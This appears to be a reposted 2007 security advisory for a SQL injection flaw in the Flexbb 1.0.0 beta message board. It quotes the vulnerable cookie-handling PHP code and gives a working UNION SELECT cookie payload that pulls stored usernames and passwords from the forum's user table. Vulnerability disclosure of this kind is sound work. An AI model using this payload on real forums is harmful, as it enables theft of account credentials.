Flexbb Sql Injection

2007.03.30
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-Other


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

KAPDA New advisory Vendor: http://www.flexbb.net Vulnerable Version: 1.0.0 10005 Beta Release 1 Bug: SQL Injection Exploitation: Remote with browser Description: -------------------- Flexbb is a freely available PHP-based message board program that uses a MySQL database. Vulnerability: -------------------- Sql Injection: The software does not properly validate user-supplied input that may allow a remote user to launch Sql injection attacks. There are multiple Input Validation errors, for example: // Code Snippet // Includes/Start.php // Lines #190-197 if($_COOKIE['flexbb_lang_id'] == "") { $lang_id = $config['default_lang_id']; } else { $lang_id = $_COOKIE['flexbb_lang_id']; //--->Input Validation Error } POC: -------------------- Condition: Magic quotes GPC = Off GET: http://example.com/flexbb/index.php?debug=1 Cookie Name = flexbb_lang_id Cookie Value = none' UNION SELECT 'en',`username`, `password`,1,1 FROM `flexbb_users` WHERE `group` = '4 original Advisory: -------------------- http://www.kapda.ir/advisory-481.html Solution: -------------------- No response from vendor, there is no solution at the time of this entry. Credit : -------------------- Discovered & released by trueend5 (trueend5 kapda ir) Security Science Researchers Institute Of Iran [http://www.KAPDA.ir] ________________________________________________________________________ ____________ TV dinner still cooling? Check out "Tonight's Picks" on Yahoo! TV. http://tv.yahoo.com/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top